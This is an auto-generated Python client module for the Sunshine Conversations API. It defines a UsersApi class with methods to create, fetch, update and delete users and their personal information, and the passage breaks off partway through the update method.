        req.url = "https://google.com:443"
        req.headers["Host"] = "google.com:443"
        self.assertTrue(proxy_adapter._is_valid_host_header(req))
        req.url = "https://google.com:8080"
        self.assertFalse(proxy_adapter._is_valid_host_header(req))

    def test__remove_host_header(self):
        """_remove_host_header leaves the request without a Host header."""
        proxy_adapter = requests_ntlm2.adapters.HttpProxyAdapter()
        req = requests.Request()
        self.assertIsNone(proxy_adapter._remove_host_header(req))
        self.assertIsNone(req.headers.get("Host"))
        req.headers["Host"] = "google.com:443"
        self.assertIsNone(proxy_adapter._remove_host_header(req))
        self.assertIsNone(req.headers.get("Host"))

    @mock.patch("requests_ntlm2.adapters.HttpProxyAdapter._add_host_header")
    def test_add_headers(self, mock_add_host_header):
        """add_headers delegates Host handling to _add_host_header."""
        proxy_adapter = requests_ntlm2.adapters.HttpProxyAdapter()
        req = requests.Request(url="http://github.com:80")
        self.assertIsNone(proxy_adapter.add_headers(req))
        mock_add_host_header.assert_called_once_with(req)
class TestHttpNtlmAdapter(unittest.TestCase):
@mock.patch("requests_ntlm2.adapters.HttpNtlmAdapter._teardown")
@mock.patch("requests_ntlm2.adapters.HttpNtlmAdapter._setup")
def test_init(self, mock_setup, mock_teardown):
    """Constructing the adapter runs _setup once and never _teardown."""
    ntlm_adapter = requests_ntlm2.adapters.HttpNtlmAdapter("username", "password")
    for expected_type in (
        requests_ntlm2.adapters.HttpNtlmAdapter,
        requests_ntlm2.adapters.HttpProxyAdapter,
        requests.adapters.HTTPAdapter,
    ):
        self.assertIsInstance(ntlm_adapter, expected_type)
    mock_setup.assert_called_once_with("username", "password", 3, False)
    mock_teardown.assert_not_called()
@mock.patch("requests_ntlm2.adapters.HttpNtlmAdapter._teardown")
@mock.patch("requests_ntlm2.adapters.HttpNtlmAdapter._setup")
def test_init__strict_mode(self, mock_setup, mock_teardown):
adapter = requests_ntlm2.adapters.HttpNtlmAdapter(
"username",
"password",
ntlm_strict_mode=True
)
self.assertIsInstance(adapter, requests_ntlm2.adapters.HttpNtlmAdapter)
self.assertIsInstance(adapter, requests_ntlm2.adapters.HttpProxyAdapter)
self.assertIsInstance(adapter, requests.adapters.HTTPAdapter)
mock_setup.assert_called_once_with("username", "password", 3, True)
mock_teardown.assert_not_called()
@mock.patch("requests_ntlm2.adapters.HttpNtlmAdapter._teardown")
@mock.patch("requests_ntlm2.adapters.HttpNtlmAdapter._setup")
def close(self, mock_setup, mock_teardown):
adapter = requests_ntlm2.adapters.HttpNtlmAdapter("username", "password")
self.assertIsNone(adapter.close())
mock_setup.assert_called_once_with("username", "password", 3)
mock_teardown.assert_called_once()
@mock.patch("requests_ntlm2.connection.HTTPSConnection.set_ntlm_auth_credentials")
def test__setup(self, mock_set_ntlm_auth_credentials):
from requests.packages.urllib3.poolmanager import pool_classes_by_scheme
adapter = requests_ntlm2.adapters.HttpNtlmAdapter("username", "password")
mock_set_ntlm_auth_credentials.assert_called_once_with("username", "password")
http_conn_cls = pool_classes_by_scheme["http"].ConnectionCls
https_conn_cls = pool_classes_by_scheme["https"].ConnectionCls
self.assertTrue(http_conn_cls, requests_ntlm2.connection.HTTPConnection)
self.assertTrue(https_conn_cls, requests_ntlm2.connection.HTTPSConnection)
adapter.close()
@mock.patch("requests_ntlm2.connection.HTTPSConnection.clear_ntlm_auth_credentials")
@mock.patch("requests_ntlm2.connection.HTTPSConnection.set_ntlm_auth_credentials")
def test_close(self, set_ntlm_auth_credentials, clear_ntlm_auth_credentials):
from requests.packages.urllib3.poolmanager import pool_classes_by_scheme
adapter = requests_ntlm2.adapters.HttpNtlmAdapter("username2", "password")
set_ntlm_auth_credentials.assert_called_once_with("username2", "password")
http_conn_cls = pool_classes_by_scheme["http"].ConnectionCls
https_conn_cls = pool_classes_by_scheme["https"].ConnectionCls
self.assertTrue(http_conn_cls, requests_ntlm2.connection.HTTPConnection)
self.assertTrue(https_conn_cls, requests_ntlm2.connection.HTTPSConnection)
adapter.close()
clear_ntlm_auth_credentials.assert_called_once()
http_conn_cls = pool_classes_by_scheme["http"].ConnectionCls
https_conn_cls = pool_classes_by_scheme["https"].ConnectionCls
self.assertTrue(http_conn_cls, HTTPConnection)
self.assertTrue(https_conn_cls, HTTPSConnection)
| 46.699346
| 88
| 0.729321
| 793
| 7,145
| 6.278689
| 0.103405
| 0.083551
| 0.101225
| 0.089978
| 0.850171
| 0.833099
| 0.806186
| 0.775256
| 0.746937
| 0.728861
| 0
| 0.015897
| 0.163611
| 7,145
| 152
| 89
| 47.006579
| 0.817269
| 0
| 0
| 0.579365
| 0
| 0
| 0.158432
| 0.076277
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.087302
| false
| 0.079365
| 0.071429
| 0
| 0.174603
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
10d8fc5df2c715c8fe51c550b827f5348c36baa3
| 143
|
py
|
Python
|
tests/tests/__init__.py
|
kaedroho/django-modelcluster
|
29dafea8bd63c7b33493e47d2b6ff81a77997ede
|
[
"BSD-3-Clause"
] | null | null | null |
tests/tests/__init__.py
|
kaedroho/django-modelcluster
|
29dafea8bd63c7b33493e47d2b6ff81a77997ede
|
[
"BSD-3-Clause"
] | null | null | null |
tests/tests/__init__.py
|
kaedroho/django-modelcluster
|
29dafea8bd63c7b33493e47d2b6ff81a77997ede
|
[
"BSD-3-Clause"
] | null | null | null |
# Test-suite aggregator: star-import every test module so the Django test
# runner discovers all of the package's test cases via ``tests.tests``.
# NOTE: import order matters for star imports (later modules can shadow
# earlier names), so do not reorder these lines casually.
from .test_cluster import *
from .test_formset import *
from .test_serialize import *
from .test_cluster_form import *
from .test_tag import *
| 23.833333
| 32
| 0.79021
| 21
| 143
| 5.095238
| 0.380952
| 0.373832
| 0.523364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.13986
| 143
| 5
| 33
| 28.6
| 0.869919
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8014e03f4dd1dd0fa4c2c0cc7a2031dc3214bc57
| 147
|
py
|
Python
|
tests/test_sayhello.py
|
signalpillar/bootstrapy
|
2835b6e4c3dfe272aa69e3dafef955ae132eb51e
|
[
"BSD-2-Clause"
] | 96
|
2015-01-06T05:32:49.000Z
|
2022-03-29T01:02:41.000Z
|
tests/test_sayhello.py
|
signalpillar/bootstrapy
|
2835b6e4c3dfe272aa69e3dafef955ae132eb51e
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_sayhello.py
|
signalpillar/bootstrapy
|
2835b6e4c3dfe272aa69e3dafef955ae132eb51e
|
[
"BSD-2-Clause"
] | 21
|
2015-01-11T19:12:08.000Z
|
2021-08-24T11:35:35.000Z
|
#! ../env/bin/python
# -*- coding: utf-8 -*-
from mypackage import myapp
def test_sayhello():
    """say_hello should produce a greeting that embeds the given name."""
    greeting = myapp.say_hello('Kiran')
    assert greeting == 'Hello Kiran'
| 24.5
| 52
| 0.659864
| 20
| 147
| 4.75
| 0.85
| 0.210526
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008
| 0.14966
| 147
| 6
| 52
| 24.5
| 0.752
| 0.278912
| 0
| 0
| 0
| 0
| 0.152381
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
33dfded66f6f6ed12c10687161b04860c3c771dc
| 372
|
py
|
Python
|
oembed/tests/tests/__init__.py
|
EightMedia/djangoembed
|
ee325f7375c48405f9c3e7e2c0fa7f5a08fafd48
|
[
"MIT"
] | 8
|
2015-02-06T19:18:49.000Z
|
2021-01-01T05:46:02.000Z
|
oembed/tests/tests/__init__.py
|
ericholscher/djangoembed
|
8d6c3edcde782285076445577c4a2ad1c96a0350
|
[
"MIT"
] | null | null | null |
oembed/tests/tests/__init__.py
|
ericholscher/djangoembed
|
8d6c3edcde782285076445577c4a2ad1c96a0350
|
[
"MIT"
] | 5
|
2015-03-15T11:41:26.000Z
|
2018-03-08T09:45:26.000Z
|
# Test-suite aggregator: star-import every test module so the test runner
# discovers all of djangoembed's test cases through this single package.
# NOTE: later star imports can shadow names from earlier ones; keep order.
from oembed.tests.tests.consumer import *
from oembed.tests.tests.models import *
from oembed.tests.tests.parsers import *
from oembed.tests.tests.providers import *
from oembed.tests.tests.resources import *
from oembed.tests.tests.sites import *
from oembed.tests.tests.templatetags import *
from oembed.tests.tests.utils import *
from oembed.tests.tests.views import *
| 37.2
| 45
| 0.806452
| 54
| 372
| 5.555556
| 0.240741
| 0.3
| 0.45
| 0.6
| 0.693333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096774
| 372
| 9
| 46
| 41.333333
| 0.892857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d502d402ceafa28f5aaed6414263f508a7671f36
| 32,725
|
py
|
Python
|
sunshine_conversations_client/api/users_api.py
|
Dima2022/sunshine-conversations-python
|
8085a82dc320d97f09bb0174d11dd1865a65404a
|
[
"Apache-2.0"
] | 4
|
2020-09-27T14:28:25.000Z
|
2022-02-02T13:51:29.000Z
|
sunshine_conversations_client/api/users_api.py
|
Dima2022/sunshine-conversations-python
|
8085a82dc320d97f09bb0174d11dd1865a65404a
|
[
"Apache-2.0"
] | 3
|
2021-09-30T18:18:58.000Z
|
2021-12-04T07:55:23.000Z
|
sunshine_conversations_client/api/users_api.py
|
Dima2022/sunshine-conversations-python
|
8085a82dc320d97f09bb0174d11dd1865a65404a
|
[
"Apache-2.0"
] | 5
|
2020-11-07T02:08:18.000Z
|
2021-12-07T17:10:23.000Z
|
# coding: utf-8
"""
Sunshine Conversations API
The version of the OpenAPI document: 9.4.5
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from sunshine_conversations_client.api_client import ApiClient
from sunshine_conversations_client.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class UsersApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_user(self, app_id, user_create_body, **kwargs): # noqa: E501
"""Create User # noqa: E501
Creates a new user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_user(app_id, user_create_body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param UserCreateBody user_create_body: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: UserResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_user_with_http_info(app_id, user_create_body, **kwargs) # noqa: E501
    def create_user_with_http_info(self, app_id, user_create_body, **kwargs):  # noqa: E501
        """Create User  # noqa: E501

        Creates a new user.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.create_user_with_http_info(app_id, user_create_body, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str app_id: Identifies the app. (required)
        :param UserCreateBody user_create_body: (required)
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(UserResponse, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # NOTE: locals() must stay the first statement — it snapshots exactly
        # self, app_id, user_create_body and the kwargs dict; introducing any
        # local before this line would pollute the snapshot.
        local_var_params = locals()

        all_params = [
            'app_id',
            'user_create_body'
        ]
        all_params.extend(
            [
                'async_req',
                '_return_http_data_only',
                '_preload_content',
                '_request_timeout'
            ]
        )

        # Flatten kwargs into local_var_params, rejecting unknown keywords.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method create_user" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'app_id' is set
        if self.api_client.client_side_validation and ('app_id' not in local_var_params or  # noqa: E501
                                                        local_var_params['app_id'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `app_id` when calling `create_user`")  # noqa: E501
        # verify the required parameter 'user_create_body' is set
        if self.api_client.client_side_validation and ('user_create_body' not in local_var_params or  # noqa: E501
                                                        local_var_params['user_create_body'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `user_create_body` when calling `create_user`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'app_id' in local_var_params:
            path_params['appId'] = local_var_params['app_id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'user_create_body' in local_var_params:
            body_params = local_var_params['user_create_body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['basicAuth', 'bearerAuth']  # noqa: E501

        return self.api_client.call_api(
            '/v2/apps/{appId}/users', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='UserResponse',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
def delete_user(self, app_id, user_id_or_external_id, **kwargs): # noqa: E501
"""Delete User # noqa: E501
Delete a user, its clients and its conversation history. The user is considered completely deleted once the `user:delete` webhook is fired. To only delete a user’s personal information, see [Delete User Personal Information](#operation/deleteUserPersonalInformation). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_user(app_id, user_id_or_external_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param str user_id_or_external_id: The user's id or externalId. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_user_with_http_info(app_id, user_id_or_external_id, **kwargs) # noqa: E501
    def delete_user_with_http_info(self, app_id, user_id_or_external_id, **kwargs):  # noqa: E501
        """Delete User  # noqa: E501

        Delete a user, its clients and its conversation history. The user is considered completely deleted once the `user:delete` webhook is fired. To only delete a user’s personal information, see [Delete User Personal Information](#operation/deleteUserPersonalInformation).  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_user_with_http_info(app_id, user_id_or_external_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str app_id: Identifies the app. (required)
        :param str user_id_or_external_id: The user's id or externalId. (required)
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(object, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # NOTE: locals() must stay the first statement — it snapshots exactly
        # self, app_id, user_id_or_external_id and the kwargs dict.
        local_var_params = locals()

        all_params = [
            'app_id',
            'user_id_or_external_id'
        ]
        all_params.extend(
            [
                'async_req',
                '_return_http_data_only',
                '_preload_content',
                '_request_timeout'
            ]
        )

        # Flatten kwargs into local_var_params, rejecting unknown keywords.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_user" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'app_id' is set
        if self.api_client.client_side_validation and ('app_id' not in local_var_params or  # noqa: E501
                                                        local_var_params['app_id'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `app_id` when calling `delete_user`")  # noqa: E501
        # verify the required parameter 'user_id_or_external_id' is set
        if self.api_client.client_side_validation and ('user_id_or_external_id' not in local_var_params or  # noqa: E501
                                                        local_var_params['user_id_or_external_id'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `user_id_or_external_id` when calling `delete_user`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'app_id' in local_var_params:
            path_params['appId'] = local_var_params['app_id']  # noqa: E501
        if 'user_id_or_external_id' in local_var_params:
            path_params['userIdOrExternalId'] = local_var_params['user_id_or_external_id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['basicAuth', 'bearerAuth']  # noqa: E501

        return self.api_client.call_api(
            '/v2/apps/{appId}/users/{userIdOrExternalId}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='object',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
def delete_user_personal_information(self, app_id, user_id_or_external_id, **kwargs): # noqa: E501
"""Delete User Personal Information # noqa: E501
Delete a user’s personal information. Calling this API will clear `givenName`, `surname`, `email` and `avatarUrl` and every custom property for the specified user. For every client owned by the user, it will also clear `displayName`, `avatarUrl` and any channel specific information stored in the info and raw fields. Calling this API doesn’t delete the user’s conversation history. To fully delete the user, see [Delete User](#operation/deleteUser). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_user_personal_information(app_id, user_id_or_external_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param str user_id_or_external_id: The user's id or externalId. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: UserResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_user_personal_information_with_http_info(app_id, user_id_or_external_id, **kwargs) # noqa: E501
    def delete_user_personal_information_with_http_info(self, app_id, user_id_or_external_id, **kwargs):  # noqa: E501
        """Delete User Personal Information  # noqa: E501

        Delete a user’s personal information. Calling this API will clear `givenName`, `surname`, `email` and `avatarUrl` and every custom property for the specified user. For every client owned by the user, it will also clear `displayName`, `avatarUrl` and any channel specific information stored in the info and raw fields. Calling this API doesn’t delete the user’s conversation history. To fully delete the user, see [Delete User](#operation/deleteUser).  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_user_personal_information_with_http_info(app_id, user_id_or_external_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str app_id: Identifies the app. (required)
        :param str user_id_or_external_id: The user's id or externalId. (required)
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(UserResponse, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # NOTE: locals() must stay the first statement — it snapshots exactly
        # self, app_id, user_id_or_external_id and the kwargs dict.
        local_var_params = locals()

        all_params = [
            'app_id',
            'user_id_or_external_id'
        ]
        all_params.extend(
            [
                'async_req',
                '_return_http_data_only',
                '_preload_content',
                '_request_timeout'
            ]
        )

        # Flatten kwargs into local_var_params, rejecting unknown keywords.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_user_personal_information" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'app_id' is set
        if self.api_client.client_side_validation and ('app_id' not in local_var_params or  # noqa: E501
                                                        local_var_params['app_id'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `app_id` when calling `delete_user_personal_information`")  # noqa: E501
        # verify the required parameter 'user_id_or_external_id' is set
        if self.api_client.client_side_validation and ('user_id_or_external_id' not in local_var_params or  # noqa: E501
                                                        local_var_params['user_id_or_external_id'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `user_id_or_external_id` when calling `delete_user_personal_information`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'app_id' in local_var_params:
            path_params['appId'] = local_var_params['app_id']  # noqa: E501
        if 'user_id_or_external_id' in local_var_params:
            path_params['userIdOrExternalId'] = local_var_params['user_id_or_external_id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['basicAuth', 'bearerAuth']  # noqa: E501

        return self.api_client.call_api(
            '/v2/apps/{appId}/users/{userIdOrExternalId}/personalinformation', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='UserResponse',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_user(self, app_id, user_id_or_external_id, **kwargs): # noqa: E501
"""Get User # noqa: E501
Fetches an individual user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user(app_id, user_id_or_external_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param str user_id_or_external_id: The user's id or externalId. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: UserResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_user_with_http_info(app_id, user_id_or_external_id, **kwargs) # noqa: E501
    def get_user_with_http_info(self, app_id, user_id_or_external_id, **kwargs):  # noqa: E501
        """Get User  # noqa: E501

        Fetches an individual user.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_user_with_http_info(app_id, user_id_or_external_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str app_id: Identifies the app. (required)
        :param str user_id_or_external_id: The user's id or externalId. (required)
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(UserResponse, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # NOTE: locals() must stay the first statement — it snapshots exactly
        # self, app_id, user_id_or_external_id and the kwargs dict.
        local_var_params = locals()

        all_params = [
            'app_id',
            'user_id_or_external_id'
        ]
        all_params.extend(
            [
                'async_req',
                '_return_http_data_only',
                '_preload_content',
                '_request_timeout'
            ]
        )

        # Flatten kwargs into local_var_params, rejecting unknown keywords.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_user" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'app_id' is set
        if self.api_client.client_side_validation and ('app_id' not in local_var_params or  # noqa: E501
                                                        local_var_params['app_id'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `app_id` when calling `get_user`")  # noqa: E501
        # verify the required parameter 'user_id_or_external_id' is set
        if self.api_client.client_side_validation and ('user_id_or_external_id' not in local_var_params or  # noqa: E501
                                                        local_var_params['user_id_or_external_id'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `user_id_or_external_id` when calling `get_user`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'app_id' in local_var_params:
            path_params['appId'] = local_var_params['app_id']  # noqa: E501
        if 'user_id_or_external_id' in local_var_params:
            path_params['userIdOrExternalId'] = local_var_params['user_id_or_external_id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['basicAuth', 'bearerAuth']  # noqa: E501

        return self.api_client.call_api(
            '/v2/apps/{appId}/users/{userIdOrExternalId}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='UserResponse',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
def update_user(self, app_id, user_id_or_external_id, user_update_body, **kwargs): # noqa: E501
"""Update User # noqa: E501
Updates a user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_user(app_id, user_id_or_external_id, user_update_body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param str user_id_or_external_id: The user's id or externalId. (required)
:param UserUpdateBody user_update_body: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: UserResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_user_with_http_info(app_id, user_id_or_external_id, user_update_body, **kwargs) # noqa: E501
def update_user_with_http_info(self, app_id, user_id_or_external_id, user_update_body, **kwargs):  # noqa: E501
    """Update User  # noqa: E501

    Updates a user.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.update_user_with_http_info(app_id, user_id_or_external_id, user_update_body, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str app_id: Identifies the app. (required)
    :param str user_id_or_external_id: The user's id or externalId. (required)
    :param UserUpdateBody user_update_body: (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(UserResponse, status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # Gather the explicit parameters, then fold in any recognized keyword
    # options; anything else is a caller error.
